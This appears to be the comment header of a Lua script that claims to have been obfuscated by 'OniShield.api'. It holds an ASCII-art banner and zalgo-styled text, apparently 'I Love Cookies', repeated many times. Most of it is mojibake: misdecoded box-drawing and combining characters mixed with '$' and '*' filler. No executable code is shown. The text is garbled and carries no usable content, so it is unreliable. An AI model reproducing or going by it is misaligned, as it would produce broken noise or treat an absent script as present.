-- [((Made By OniShield.api))]
-- oh no ðŸ˜¢, this script is obfuscated by Oni$hield.api ðŸ’°
--[[
â–‘$','$â–ˆ$','$â–ˆâ–ˆâ–ˆâ–ˆâ•—$$','$$$$$','$$$$$','$$$$ or $$$$*28(80>2*9)â–‘â–ˆâ–ˆâ–ˆâ•—$$$$$','$$$$$','$$$$$','$$$$ or $$$$*01(26>0*34)â–‘â–‘â–ˆâ–ˆâ•—â–ˆâ–ˆâ•—$$$$$','$$$$$','$$$$$,$$$$ or $$$$*67(24>22*0)â–‘â–ˆâ–ˆ$','$â–ˆâ–ˆâ–ˆâ–ˆ$â•—â–ˆâ–ˆâ•—â–‘â–‘â–ˆâ–ˆâ•—$â–ˆâ–ˆâ•—â–ˆ$â–ˆâ–ˆâ–ˆâ–ˆâ–ˆ$$â–ˆâ•—$$â–ˆâ–ˆâ•—â–‘â–‘$$â–‘â–‘â–‘â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•—â–‘â–‘â–‘â–‘â–‘â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•—â–‘â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•—â–‘â–ˆâ–ˆâ•—
â–ˆ(*******','***********','*****â–ˆâ•”â•â•â–ˆâ–ˆâ•—â–ˆâ–ˆâ–ˆâ–ˆâ•—â–‘â–ˆâ–ˆâ•‘â–ˆâ–ˆâ•‘â–ˆ*********','***********','*****â–ˆâ•”â•â•â•â•â•â–ˆâ–ˆ************)â•‘â–‘â–‘â–ˆâ–ˆâ•‘â–ˆâ–ˆâ•‘â–ˆâ–ˆâ•”â•â•â•â•â•â–ˆâ–ˆâ•‘â–‘â–‘â–‘â–‘â–‘â–ˆâ–ˆâ•”â•â•â–ˆâ–ˆâ•—â–‘â–‘â–‘â–ˆâ–ˆâ•”â•â•â–ˆâ–ˆâ•—â–ˆâ–ˆâ•”â•â•â–ˆâ–ˆâ•—â–ˆâ–ˆâ•‘
â–ˆâ–ˆâ•‘J(M>*),($$$$$$$$$','$$$$$$$$)â–‘â–‘â–ˆâ–ˆâ•‘â–ˆâ–ˆâ•”â–ˆâ–ˆâ•—â–ˆ($$$$*17(56<12^98)â–ˆâ•‘â–ˆâ–ˆâ•‘â•šâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•—$$$$$$â–‘â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•‘â–ˆâ–ˆâ•‘â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•—$$$$$$â–‘â–‘â–ˆâ–ˆâ•‘â–‘â–‘â–‘â–‘â–‘$$$$$$â–ˆâ–ˆâ•‘â–‘â–‘â–ˆâ–ˆâ•‘$$$$$â–‘â–‘â–‘â–ˆ$$$$$$â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•‘â–ˆâ–ˆâ–ˆ$$$$$$â–ˆâ–ˆâ–ˆâ•”â•â–ˆâ–ˆâ•‘
â–ˆ$$$$$$$(71*01^888)â–ˆâ•‘â–‘â–‘******â–ˆâ–ˆâ•‘â–ˆâ–ˆâ•‘â•šâ–ˆâ–ˆâ–ˆâ–ˆâ•‘â–ˆâ–ˆâ•‘(*******','***********','******â–‘â•šâ•â•â•â–ˆâ–ˆâ•—*******','***********','******â–ˆâ–ˆâ•”*******','***********','******â•â•â–ˆâ–ˆâ•‘â–ˆâ–ˆâ•‘â–ˆâ–ˆ*******','***********','******)â•”â•â•â•â–‘â–‘â–ˆâ–ˆâ•‘â–‘â–‘â–‘â–‘â–‘â–ˆâ–ˆâ•‘â–‘â–‘â–ˆâ–ˆâ•‘â–‘â–‘â–‘â–ˆâ–ˆâ•”â•â•â–ˆâ–ˆâ•‘â–ˆâ–ˆâ•”â•â•â•â•â–‘â–ˆâ–ˆâ•‘
â•š('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•”â•â–ˆâ–ˆâ•‘â–‘â•šâ–ˆâ–ˆâ–ˆâ•‘â–ˆâ–ˆâ•‘â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•”â•â–ˆâ–ˆ$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')â•‘â–‘â–‘â–ˆâ–ˆâ•‘â–ˆâ–ˆâ•‘â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•—â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•—â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•”â•â–ˆâ–ˆâ•—â–ˆâ–ˆâ•‘â–‘â–‘â–ˆâ–ˆâ•‘â–ˆâ–ˆâ•‘â–‘â–‘â–‘â–‘â–‘â–ˆâ–ˆâ•‘
â–‘â•šâ•â•â•â•â•â–‘â•šâ•â•â–‘â–‘â•šâ•â•â•â•šâ•â•â•šâ•â•â•â•â•â•â–‘â•šâ•â•â–‘â–‘â•šâ•â•â•šâ•â•â•šâ•â•â•â•â•â•â•â•šâ•â•â•â•â•â•â•â•šâ•â•â•â•â•â•â–‘â•šâ•â•â•šâ•â•â–‘â–‘â•šâ•â•â•šâ•â•â–‘â–‘â–‘â–‘â–‘â•šâ•â•
]]
--[[
IÌ¶ÌšÍÌ„Ì†Ì†ÌÌÌ„ÌÌ¿ÌƒÍ„Í„Í‘ÍÌ¬ÌœÍœÌ«Ì¡Ì¦Ì£Ì¡Ì£Ì Í‡Ì¦Ì¦Ì¯Ì³Í‰Ì¼Ì±Ì² ÌµÌ€Í—Ì…ÌÍÍ›ÌŒÌŽÌ›Í Í€Í‹Ì‰Ì”Í›Ì‚ÍƒÌ¿Í„Í’Ì‡Í„ÍŠÍ„Ì¨Ì²Ì±ÌœÍˆÌ™Ì¦Ì¥ÌªÌ£Ì£Í‰Í…Ì°Ì°ÍŽÌ²Ì¦Ì°Ì™LÌ·Í€ÍÌŒÌ«Ì¡Ì©Ì–Ì¼Ì­Ì¨Ì–ÍˆÌŸÌ¢Ì–ÍšÌ³Ì°Ì»Í™Ì¦Ì¯Í“Ì¼Í–ÌÌ±Ì¦Ì³ÍœÌ¼Ì˜OÌ·Í‹ÌÍŒÌ‹ÌŽÌ”Ì…ÌŽÍ Í€Ì‚Í˜ÌŒÌ”ÍŒÍÌ”Í’ÍÍÌÌ€Ì’ÍŠÌ¿Ì±Í‰ÍŽÌ°Ì©Í‰Ì¥ÍŽÌ Í“Í‡Ì¼Ì¼Ì¨vÌµÌ‘ÍÍ€ÌƒÌ‡ÍÍ‹Ì›ÍÍÌ”ÌÍ„Ì¾ÍÍÌÌÌ¹Ì¼Í‡Ì¢Ì²Í•Ì£ÌœÌ°Í…Ì–Í–Ì²ÍœÌœÌ­Í”Ì¬Í“eÌ¶Ì½Ì„ÌÌ•Í‹Ì½Í˜Ì„Í‘Í›Ì’ÌÌƒÌ‹Ì¯ÍœÌ˜Í‰ÌœÌ°Ì¼Ì˜Í•Í“Í–Ì³Ì¬ÌžÌœÌ«ÌªÌŸÍ–ÍˆÌ» Ì¸Ì‘Ì‚Í€ÌˆÍ Ì•Í€Í„Ì¾ÍŠÌ‚Í„Ì¾Í‘ÌŽÍŠÍ‹Í‚Í‚Ì…Í†Í†ÌˆÍ€Ì˜Ì Ì˜Ì¡Ì¯Ì¦Ì«Ì¬ÌžÌ¤Ì®Ì¥Ì Ì­ÌºÌ¤Ì™CÌ¸Í—Í†ÌŠÍŒÌ‘Í›Í„Ì…Ì’ÍƒÍ„Ì½Ì³Ì®Í‡Ì¨Í”Ì—Ì¤Ì¹ÍšÌ Ì®Ì¨ÌÍ“Ì˜Ì²Í”oÌ¸Í„ÍŠÌÌŽÍ€Í‘Ì‘Ì¾ÍŠÌ‰Í›Ì½ÍŒÍÌ½Í†Í†Í‚Ì†ÌŠÌ”Í…Ì Ì ÍÌŸÌ¹Í™Ì°Ì³ÍˆÍ“Ì¢Ì¬Ì™Ì¢Ì³Ì˜oÌ´ÌÍ ÍÍŒÍ€Í„ÌÌ“ÍÍ‘ÌÌ”Ì¾ÍÌ‡ÌŸÍ‡Ì¯Ì»Ì»Ì¼ÌžÌ£Ì­Ì¡Í–ÌœkÌµÍÌ€Í›Ì…ÍÌ‚Ì’ÍŠÍ›ÍŠÌ±Ì£Ì¨Ì­ÌºÌÌ—ÌŸÌ¹Í•ÌºÌ¼ÌŸÌÌÌ¬ÌŸÍˆÍœÍˆÌŸÌ¹Ì«ÌœÌ™ÌªÌ™Ì©Ì«Ì»iÌ¶ÌšÍ‘Ì…Ì„Í„ÌˆÌ•Ì€ÌšÍ€Ì¿Í†Í”ÌŸÌ—Ì¯Ì¼Í…Ì¡Ì³Ì¥Í–eÌ¸ÌÌ€Í„Í„ÌÌÌÍ‚ÍÌ³Ì¢ÍÍŽÌ¢sÌ·Í’Ì‰ÌŠÌ—Ì–ÍœÌžÌºÌ¦Ì—Í”Ì«Ì¥ÌŸÌ Ì³IÌ¶ÌšÍÌ„Ì†Ì†ÌÌÌ„ÌÌ¿ÌƒÍ„Í„Í‘ÍÌ¬ÌœÍœÌ«Ì¡Ì¦Ì£Ì¡Ì£Ì Í‡Ì¦Ì¦Ì¯Ì³Í‰Ì¼Ì±Ì² ÌµÌ€Í—Ì…ÌÍÍ›ÌŒÌŽÌ›Í Í€Í‹Ì‰Ì”Í›Ì‚ÍƒÌ¿Í„Í’Ì‡Í„ÍŠÍ„Ì¨Ì²Ì±ÌœÍˆÌ™Ì¦Ì¥ÌªÌ£Ì£Í‰Í…Ì°Ì°ÍŽÌ²Ì¦Ì°Ì™LÌ·Í€ÍÌŒÌ«Ì¡Ì©Ì–Ì¼Ì­Ì¨Ì–ÍˆÌŸÌ¢Ì–ÍšÌ³Ì°Ì»Í™Ì¦Ì¯Í“Ì¼Í–ÌÌ±Ì¦Ì³ÍœÌ¼Ì˜OÌ·Í‹ÌÍŒÌ‹ÌŽÌ”Ì…ÌŽÍ Í€Ì‚Í˜ÌŒÌ”ÍŒÍÌ”Í’ÍÍÌÌ€Ì’ÍŠÌ¿Ì±Í‰ÍŽÌ°Ì©Í‰Ì¥ÍŽÌ Í“Í‡Ì¼Ì¼Ì¨vÌµÌ‘ÍÍ€ÌƒÌ‡ÍÍ‹Ì›ÍÍÌ”ÌÍ„Ì¾ÍÍÌÌÌ¹Ì¼Í‡Ì¢Ì²Í•Ì£ÌœÌ°Í…Ì–Í–Ì²ÍœÌœÌ­Í”Ì¬Í“eÌ¶Ì½Ì„ÌÌ•Í‹Ì½Í˜Ì„Í‘Í›Ì’ÌÌƒÌ‹Ì¯ÍœÌ˜Í‰ÌœÌ°Ì¼Ì˜Í•Í“Í–Ì³Ì¬ÌžÌœÌ«ÌªÌŸÍ–ÍˆÌ» Ì¸Ì‘Ì‚Í€ÌˆÍ Ì•Í€Í„Ì¾ÍŠÌ‚Í„Ì¾Í‘ÌŽÍŠÍ‹Í‚Í‚Ì…Í†Í†ÌˆÍ€Ì˜Ì Ì˜Ì¡Ì¯Ì¦Ì«Ì¬ÌžÌ¤Ì®Ì¥Ì Ì­ÌºÌ¤Ì™CÌ¸Í—Í†ÌŠÍŒÌ‘Í›Í„Ì…Ì’ÍƒÍ„Ì½Ì³Ì®Í‡Ì¨Í”Ì—Ì¤Ì¹ÍšÌ Ì®Ì¨ÌÍ“Ì˜Ì²Í”oÌ¸Í„ÍŠÌÌŽÍ€Í‘Ì‘Ì¾ÍŠÌ‰Í›Ì½ÍŒÍÌ½Í†Í†Í‚Ì†ÌŠÌ”Í…Ì Ì ÍÌŸÌ¹Í™Ì°Ì³ÍˆÍ“Ì¢Ì¬Ì™Ì¢Ì³Ì˜oÌ´ÌÍ ÍÍŒÍ€Í„ÌÌ“ÍÍ‘ÌÌ”Ì¾ÍÌ‡ÌŸÍ‡Ì¯Ì»Ì»Ì¼ÌžÌ£Ì­Ì¡Í–ÌœkÌµÍÌ€Í›Ì…ÍÌ‚Ì’ÍŠÍ›ÍŠÌ±Ì£Ì¨Ì­ÌºÌÌ—ÌŸÌ¹Í•ÌºÌ¼ÌŸÌÌÌ¬ÌŸÍˆÍœÍˆÌŸÌ¹Ì«ÌœÌ™ÌªÌ™Ì©Ì«Ì»iÌ¶ÌšÍ‘Ì…Ì„Í„ÌˆÌ•Ì€ÌšÍ€Ì¿Í†Í”ÌŸÌ—Ì¯Ì¼Í…Ì¡Ì³Ì¥Í–eÌ¸ÌÌ€Í„Í„ÌÌÌÍ‚ÍÌ³Ì¢ÍÍŽÌ¢sÌ·Í’Ì‰ÌŠÌ—Ì–ÍœÌžÌºÌ¦Ì—Í”Ì«Ì¥ÌŸÌ Ì³vvIÌ¶ÌšÍÌ„Ì†Ì†ÌÌÌ„ÌÌ¿ÌƒÍ„Í„Í‘ÍÌ¬ÌœÍœÌ«Ì¡Ì¦Ì£Ì¡Ì£Ì Í‡Ì¦Ì¦Ì¯Ì³Í‰Ì¼Ì±Ì² ÌµÌ€Í—Ì…ÌÍÍ›ÌŒÌŽÌ›Í Í€Í‹Ì‰Ì”Í›Ì‚ÍƒÌ¿Í„Í’Ì‡Í„ÍŠÍ„Ì¨Ì²Ì±ÌœÍˆÌ™Ì¦Ì¥ÌªÌ£Ì£Í‰Í…Ì°Ì°ÍŽÌ²Ì¦Ì°Ì™LÌ·Í€ÍÌŒÌ«Ì¡Ì©Ì–Ì¼Ì­Ì¨Ì–ÍˆÌŸÌ¢Ì–ÍšÌ³Ì°Ì»Í™Ì¦Ì¯Í“Ì¼Í–ÌÌ±Ì¦Ì³ÍœÌ¼Ì˜OÌ·Í‹ÌÍŒÌ‹ÌŽÌ”Ì…ÌŽÍ Í€Ì‚Í˜ÌŒÌ”ÍŒÍÌ”Í’ÍÍÌÌ€Ì’ÍŠÌ¿Ì±Í‰ÍŽÌ°Ì©Í‰Ì¥ÍŽÌ Í“Í‡Ì¼Ì¼Ì¨vÌµÌ‘ÍÍ€ÌƒÌ‡ÍÍ‹Ì›ÍÍÌ”ÌÍ„Ì¾ÍÍÌÌÌ¹Ì¼Í‡Ì¢Ì²Í•Ì£ÌœÌ°Í…Ì–Í–Ì²ÍœÌœÌ­Í”Ì¬Í“eÌ¶Ì½Ì„ÌÌ•Í‹Ì½Í˜Ì„Í‘Í›Ì’ÌÌƒÌ‹Ì¯ÍœÌ˜Í‰ÌœÌ°Ì¼Ì˜Í•Í“Í–Ì³Ì¬ÌžÌœÌ«ÌªÌŸÍ–ÍˆÌ» Ì¸Ì‘Ì‚Í€ÌˆÍ Ì•Í€Í„Ì¾ÍŠÌ‚Í„Ì¾Í‘ÌŽÍŠÍ‹Í‚Í‚Ì…Í†Í†ÌˆÍ€Ì˜Ì Ì˜Ì¡Ì¯Ì¦Ì«Ì¬ÌžÌ¤Ì®Ì¥Ì Ì­ÌºÌ¤Ì™CÌ¸Í—Í†ÌŠÍŒÌ‘Í›Í„Ì…Ì’ÍƒÍ„Ì½Ì³Ì®Í‡Ì¨Í”Ì—Ì¤Ì¹ÍšÌ Ì®Ì¨ÌÍ“Ì˜Ì²Í”oÌ¸Í„ÍŠÌÌŽÍ€Í‘Ì‘Ì¾ÍŠÌ‰Í›Ì½ÍŒÍÌ½Í†Í†Í‚Ì†ÌŠÌ”Í…Ì Ì ÍÌŸÌ¹Í™Ì°Ì³ÍˆÍ“Ì¢Ì¬Ì™Ì¢Ì³Ì˜oÌ´ÌÍ ÍÍŒÍ€Í„ÌÌ“ÍÍ‘ÌÌ”Ì¾ÍÌ‡ÌŸÍ‡Ì¯Ì»Ì»Ì¼ÌžÌ£Ì­Ì¡Í–ÌœkÌµÍÌ€Í›Ì…ÍÌ‚Ì’ÍŠÍ›ÍŠÌ±Ì£Ì¨Ì­ÌºÌÌ—ÌŸÌ¹Í•ÌºÌ¼ÌŸÌÌÌ¬ÌŸÍˆÍœÍˆÌŸÌ¹Ì«ÌœÌ™ÌªÌ™Ì©Ì«Ì»iÌ¶ÌšÍ‘Ì…Ì„Í„ÌˆÌ•Ì€ÌšÍ€Ì¿Í†Í”ÌŸÌ—Ì¯Ì¼Í…Ì¡Ì³Ì¥Í–eÌ¸ÌÌ€Í„Í„ÌÌÌÍ‚ÍÌ³Ì¢ÍÍŽÌ¢sÌ·Í’Ì‰ÌŠÌ—Ì–ÍœÌžÌºÌ¦Ì—Í”Ì«Ì¥ÌŸÌ Ì³vvIÌ¶ÌšÍÌ„Ì†Ì†ÌÌÌ„ÌÌ¿ÌƒÍ„Í„Í‘ÍÌ¬ÌœÍœÌ«Ì¡Ì¦Ì£Ì¡Ì£Ì Í‡Ì¦Ì¦Ì¯Ì³Í‰Ì¼Ì±Ì² ÌµÌ€Í—Ì…ÌÍÍ›ÌŒÌŽÌ›Í Í€Í‹Ì‰Ì”Í›Ì‚ÍƒÌ¿Í„Í’Ì‡Í„ÍŠÍ„Ì¨Ì²Ì±ÌœÍˆÌ™Ì¦Ì¥ÌªÌ£Ì£Í‰Í…Ì°Ì°ÍŽÌ²Ì¦Ì°Ì™LÌ·Í€ÍÌŒÌ«Ì¡Ì©Ì–Ì¼Ì­Ì¨Ì–ÍˆÌŸÌ¢Ì–ÍšÌ³Ì°Ì»Í™Ì¦Ì¯Í“Ì¼Í–ÌÌ±Ì¦Ì³ÍœÌ¼Ì˜OÌ·Í‹ÌÍŒÌ‹ÌŽÌ”Ì…ÌŽÍ Í€Ì‚Í˜ÌŒÌ”ÍŒÍÌ”Í’ÍÍÌÌ€Ì’ÍŠÌ¿Ì±Í‰ÍŽÌ°Ì©Í‰Ì¥ÍŽÌ Í“Í‡Ì¼Ì¼Ì¨vÌµÌ‘ÍÍ€ÌƒÌ‡ÍÍ‹Ì›ÍÍÌ”ÌÍ„Ì¾ÍÍÌÌÌ¹Ì¼Í‡Ì¢Ì²Í•Ì£ÌœÌ°Í…Ì–Í–Ì²ÍœÌœÌ­Í”Ì¬Í“eÌ¶Ì½Ì„ÌÌ•Í‹Ì½Í˜Ì„Í‘Í›Ì’ÌÌƒÌ‹Ì¯ÍœÌ˜Í‰ÌœÌ°Ì¼Ì˜Í•Í“Í–Ì³Ì¬ÌžÌœÌ«ÌªÌŸÍ–ÍˆÌ» Ì¸Ì‘Ì‚Í€ÌˆÍ Ì•Í€Í„Ì¾ÍŠÌ‚Í„Ì¾Í‘ÌŽÍŠÍ‹Í‚Í‚Ì…Í†Í†ÌˆÍ€Ì˜Ì Ì˜Ì¡Ì¯Ì¦Ì«Ì¬ÌžÌ¤Ì®Ì¥Ì Ì­ÌºÌ¤Ì™CÌ¸Í—Í†ÌŠÍŒÌ‘Í›Í„Ì…Ì’ÍƒÍ„Ì½Ì³Ì®Í‡Ì¨Í”Ì—Ì¤Ì¹ÍšÌ Ì®Ì¨ÌÍ“Ì˜Ì²Í”oÌ¸Í„ÍŠÌÌŽÍ€Í‘Ì‘Ì¾ÍŠÌ‰Í›Ì½ÍŒÍÌ½Í†Í†Í‚Ì†ÌŠÌ”Í…Ì Ì ÍÌŸÌ¹Í™Ì°Ì³ÍˆÍ“Ì¢Ì¬Ì™Ì¢Ì³Ì˜oÌ´ÌÍ ÍÍŒÍ€Í„ÌÌ“ÍÍ‘ÌÌ”Ì¾ÍÌ‡ÌŸÍ‡Ì¯Ì»Ì»Ì¼ÌžÌ£Ì­Ì¡Í–ÌœkÌµÍÌ€Í›Ì…ÍÌ‚Ì’ÍŠÍ›ÍŠÌ±Ì£Ì¨Ì­ÌºÌÌ—ÌŸÌ¹Í•ÌºÌ¼ÌŸÌÌÌ¬ÌŸÍˆÍœÍˆÌŸÌ¹Ì«ÌœÌ™ÌªÌ™Ì©Ì«Ì»iÌ¶ÌšÍ‘Ì…Ì„Í„ÌˆÌ•Ì€ÌšÍ€Ì¿Í†Í”ÌŸÌ—Ì¯Ì¼Í…Ì¡Ì³Ì¥Í–eÌ¸ÌÌ€Í„Í„ÌÌÌÍ‚ÍÌ³Ì¢ÍÍŽÌ¢sÌ·Í’Ì‰ÌŠÌ—Ì–ÍœÌžÌºÌ¦Ì—Í”Ì«Ì¥ÌŸÌ Ì³IÌ¶ÌšÍÌ„Ì†Ì†ÌÌÌ„ÌÌ¿ÌƒÍ„Í„Í‘ÍÌ¬ÌœÍœÌ«Ì¡Ì¦Ì£Ì¡Ì£Ì Í‡Ì¦Ì¦Ì¯Ì³Í‰Ì¼Ì±Ì² ÌµÌ€Í—Ì…ÌÍÍ›ÌŒÌŽÌ›Í Í€Í‹Ì‰Ì”Í›Ì‚ÍƒÌ¿Í„Í’Ì‡Í„ÍŠÍ„Ì¨Ì²Ì±ÌœÍˆÌ™Ì¦Ì¥ÌªÌ£Ì£Í‰Í…Ì°Ì°ÍŽÌ²Ì¦Ì°Ì™LÌ·Í€ÍÌŒÌ«Ì¡Ì©Ì–Ì¼Ì­Ì¨Ì–ÍˆÌŸÌ¢Ì–ÍšÌ³Ì°Ì»Í™Ì¦Ì¯Í“Ì¼Í–ÌÌ±Ì¦Ì³ÍœÌ¼Ì˜OÌ·Í‹ÌÍŒÌ‹ÌŽÌ”Ì…ÌŽÍ Í€Ì‚Í˜ÌŒÌ”ÍŒÍÌ”Í’ÍÍÌÌ€Ì’ÍŠÌ¿Ì±Í‰ÍŽÌ°Ì©Í‰Ì¥ÍŽÌ Í“Í‡Ì¼Ì¼Ì¨vÌµÌ‘ÍÍ€ÌƒÌ‡ÍÍ‹Ì›ÍÍÌ”ÌÍ„Ì¾ÍÍÌÌÌ¹Ì¼Í‡Ì¢Ì²Í•Ì£ÌœÌ°Í…Ì–Í–Ì²ÍœÌœÌ­Í”Ì¬Í“eÌ¶Ì½Ì„ÌÌ•Í‹Ì½Í˜Ì„Í‘Í›Ì’ÌÌƒÌ‹Ì¯ÍœÌ˜Í‰ÌœÌ°Ì¼Ì˜Í•Í“Í–Ì³Ì¬ÌžÌœÌ«ÌªÌŸÍ–ÍˆÌ» Ì¸Ì‘Ì‚Í€ÌˆÍ Ì•Í€Í„Ì¾ÍŠÌ‚Í„Ì¾Í‘ÌŽÍŠÍ‹Í‚Í‚Ì…Í†Í†ÌˆÍ€Ì˜Ì Ì˜Ì¡Ì¯Ì¦Ì«Ì¬ÌžÌ¤Ì®Ì¥Ì Ì­ÌºÌ¤Ì™CÌ¸Í—Í†ÌŠÍŒÌ‘Í›Í„Ì…Ì’ÍƒÍ„Ì½Ì³Ì®Í‡Ì¨Í”Ì—Ì¤Ì¹ÍšÌ Ì®Ì¨ÌÍ“Ì˜Ì²Í”oÌ¸Í„ÍŠÌÌŽÍ€Í‘Ì‘Ì¾ÍŠÌ‰Í›Ì½ÍŒÍÌ½Í†Í†Í‚Ì†ÌŠÌ”Í…Ì Ì ÍÌŸÌ¹Í™Ì°Ì³ÍˆÍ“Ì¢Ì¬Ì™Ì¢Ì³Ì˜oÌ´ÌÍ ÍÍŒÍ€Í„ÌÌ“ÍÍ‘ÌÌ”Ì¾ÍÌ‡ÌŸÍ‡Ì¯Ì»Ì»Ì¼ÌžÌ£Ì­Ì¡Í–ÌœkÌµÍÌ€Í›Ì…ÍÌ‚Ì’ÍŠÍ›ÍŠÌ±Ì£Ì¨Ì­ÌºÌÌ—ÌŸÌ¹Í•ÌºÌ¼ÌŸÌÌÌ¬ÌŸÍˆÍœÍˆÌŸÌ¹Ì«ÌœÌ™ÌªÌ™Ì©Ì«Ì»iÌ¶ÌšÍ‘Ì…Ì„Í„ÌˆÌ•Ì€ÌšÍ€Ì¿Í†Í”ÌŸÌ—Ì¯Ì¼Í…Ì¡Ì³Ì¥Í–eÌ¸ÌÌ€Í„Í„ÌÌÌÍ‚ÍÌ³Ì¢ÍÍŽÌ¢sÌ·Í’Ì‰ÌŠÌ—Ì–ÍœÌžÌºÌ¦Ì—Í”Ì«Ì¥ÌŸÌ Ì³IÌ¶ÌšÍÌ„Ì†Ì†ÌÌÌ„ÌÌ¿ÌƒÍ„Í„Í‘ÍÌ¬ÌœÍœÌ«Ì¡Ì¦Ì£Ì¡Ì£Ì Í‡Ì¦Ì¦Ì¯Ì³Í‰Ì¼Ì±Ì² ÌµÌ€Í—Ì…ÌÍÍ›ÌŒÌŽÌ›Í Í€Í‹Ì‰Ì”Í›Ì‚ÍƒÌ¿Í„Í’Ì‡Í„ÍŠÍ„Ì¨Ì²Ì±ÌœÍˆÌ™Ì¦Ì¥ÌªÌ£Ì£Í‰Í…Ì°Ì°ÍŽÌ²Ì¦Ì°Ì™LÌ·Í€ÍÌŒÌ«Ì¡Ì©Ì–Ì¼Ì­Ì¨Ì–ÍˆÌŸÌ¢Ì–ÍšÌ³Ì°Ì»Í™Ì¦Ì¯Í“Ì¼Í–ÌÌ±Ì¦Ì³ÍœÌ¼Ì˜OÌ·Í‹ÌÍŒÌ‹ÌŽÌ”Ì…ÌŽÍ Í€Ì‚Í˜ÌŒÌ”ÍŒÍÌ”Í’ÍÍÌÌ€Ì’ÍŠÌ¿Ì±Í‰ÍŽÌ°Ì©Í‰Ì¥ÍŽÌ Í“Í‡Ì¼Ì¼Ì¨vÌµÌ‘ÍÍ€ÌƒÌ‡ÍÍ‹Ì›ÍÍÌ”ÌÍ„Ì¾ÍÍÌÌÌ¹Ì¼Í‡Ì¢Ì²Í•Ì£ÌœÌ°Í…Ì–Í–Ì²ÍœÌœÌ­Í”Ì¬Í“eÌ¶Ì½Ì„ÌÌ•Í‹Ì½Í˜Ì„Í‘Í›Ì’ÌÌƒÌ‹Ì¯ÍœÌ˜Í‰ÌœÌ°Ì¼Ì˜Í•Í“Í–Ì³Ì¬ÌžÌœÌ«ÌªÌŸÍ–ÍˆÌ» Ì¸Ì‘Ì‚Í€ÌˆÍ Ì•Í€Í„Ì¾ÍŠÌ‚Í„Ì¾Í‘ÌŽÍŠÍ‹Í‚Í‚Ì…Í†Í†ÌˆÍ€Ì˜Ì Ì˜Ì¡Ì¯Ì¦Ì«Ì¬ÌžÌ¤Ì®Ì¥Ì Ì­ÌºÌ¤Ì™CÌ¸Í—Í†ÌŠÍŒÌ‘Í›Í„Ì…Ì’ÍƒÍ„Ì½Ì³Ì®Í‡Ì¨Í”Ì—Ì¤Ì¹ÍšÌ Ì®Ì¨ÌÍ“Ì˜Ì²Í”oÌ¸Í„ÍŠÌÌŽÍ€Í‘Ì‘Ì¾ÍŠÌ‰Í›Ì½ÍŒÍÌ½Í†Í†Í‚Ì†ÌŠÌ”Í…Ì Ì ÍÌŸÌ¹Í™Ì°Ì³ÍˆÍ“Ì¢Ì¬Ì™Ì¢Ì³Ì˜oÌ´ÌÍ ÍÍŒÍ€Í„ÌÌ“ÍÍ‘ÌÌ”Ì¾ÍÌ‡ÌŸÍ‡Ì¯Ì»Ì»Ì¼ÌžÌ£Ì­Ì¡Í–ÌœkÌµÍÌ€Í›Ì…ÍÌ‚Ì’ÍŠÍ›ÍŠÌ±Ì£Ì¨Ì­ÌºÌÌ—ÌŸÌ¹Í•ÌºÌ¼ÌŸÌÌÌ¬ÌŸÍˆÍœÍˆÌŸÌ¹Ì«ÌœÌ™ÌªÌ™Ì©Ì«Ì»iÌ¶ÌšÍ‘Ì…Ì„Í„ÌˆÌ•Ì€ÌšÍ€Ì¿Í†Í”ÌŸÌ—Ì¯Ì¼Í…Ì¡Ì³Ì¥Í–eÌ¸ÌÌ€Í„Í„ÌÌÌÍ‚ÍÌ³Ì¢ÍÍŽÌ¢sÌ·Í’Ì‰ÌŠÌ—Ì–ÍœÌžÌºÌ¦Ì—Í”Ì«Ì¥ÌŸÌ Ì³IÌ¶ÌšÍÌ„Ì†Ì†ÌÌÌ„ÌÌ¿ÌƒÍ„Í„Í‘ÍÌ¬ÌœÍœÌ«Ì¡Ì¦Ì£Ì¡Ì£Ì Í‡Ì¦Ì¦Ì¯Ì³Í‰Ì¼Ì±Ì² ÌµÌ€Í—Ì…ÌÍÍ›ÌŒÌŽÌ›Í Í€Í‹Ì‰Ì”Í›Ì‚ÍƒÌ¿Í„Í’Ì‡Í„ÍŠÍ„Ì¨Ì²Ì±ÌœÍˆÌ™Ì¦Ì¥ÌªÌ£Ì£Í‰Í…Ì°Ì°ÍŽÌ²Ì¦Ì°Ì™LÌ·Í€ÍÌŒÌ«Ì¡Ì©Ì–Ì¼Ì­Ì¨Ì–ÍˆÌŸÌ¢Ì–ÍšÌ³Ì°Ì»Í™Ì¦Ì¯Í“Ì¼Í–ÌÌ±Ì¦Ì³ÍœÌ¼Ì˜OÌ·Í‹ÌÍŒÌ‹ÌŽÌ”Ì…ÌŽÍ Í€Ì‚Í˜ÌŒÌ”ÍŒÍÌ”Í’ÍÍÌÌ€Ì’ÍŠÌ¿Ì±Í‰ÍŽÌ°Ì©Í‰Ì¥ÍŽÌ Í“Í‡Ì¼Ì¼Ì¨vÌµÌ‘ÍÍ€ÌƒÌ‡ÍÍ‹Ì›ÍÍÌ”ÌÍ„Ì¾ÍÍÌÌÌ¹Ì¼Í‡Ì¢Ì²Í•Ì£ÌœÌ°Í…Ì–Í–Ì²ÍœÌœÌ­Í”Ì¬Í“eÌ¶Ì½Ì„ÌÌ•Í‹Ì½Í˜Ì„Í‘Í›Ì’ÌÌƒÌ‹Ì¯ÍœÌ˜Í‰ÌœÌ°Ì¼Ì˜Í•Í“Í–Ì³Ì¬ÌžÌœÌ«ÌªÌŸÍ–ÍˆÌ» Ì¸Ì‘Ì‚Í€ÌˆÍ Ì•Í€Í„Ì¾ÍŠÌ‚Í„Ì¾Í‘ÌŽÍŠÍ‹Í‚Í‚Ì…Í†Í†ÌˆÍ€Ì˜Ì 